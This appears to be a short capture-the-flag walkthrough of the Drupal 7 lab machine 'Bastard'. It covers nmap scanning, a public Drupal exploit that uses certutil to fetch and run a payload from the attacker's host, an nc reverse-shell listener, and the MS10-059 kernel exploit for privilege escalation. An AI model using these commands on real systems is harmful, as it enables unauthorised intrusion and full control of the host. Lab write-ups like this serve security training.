Ping
ping 10.10.10.9
Nmap default Scan
nmap 10.10.10.9 -oN dnmap
Nmap Script and Service Scan
nmap 10.10.10.9 -sVC -oN snmap
Nmap all port Scan
nmap -p- --min-rate 10000 10.10.10.9 -oN anmap
On port 80
Got the version of drupal in source code
Also we can see this in CHANGELOG.txt
Will move to Initial Foothold…!
Will search Public exploit for Drupal 7
Got one https://www.exploit-db.com/exploits/41564
Will run the exploit
python3 exp.py http://10.10.10.9/ -c 'certutil -urlcache -f http://10.10.14.2/met.exe c:/windows/temp/met.exe'
python3 exp.py http://10.10.10.9/ -c 'C:/Windows/Temp/met.exe'
Will trigger the payload
rlwrap nc -nvlp 443
Will move to Privilege escalation…!
Will check Our Privileges
whoami /priv
Get System info
systeminfo
Though We have Impersonate Privilege, we can’t use printspoofer or godpotato. So Will go with kernel Exploit
Found exploit in this link:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe
Will transfer the binary to target Machine and run the exploit
exp.exe 10.10.14.2 4444
rlwrap nc -nvlp 4444
Cooool….! We got Elevated.
Got user.txt in User dimitris’s Desktop
Got root.txt in Admin’s Desktop
I’m done with Bastard……:)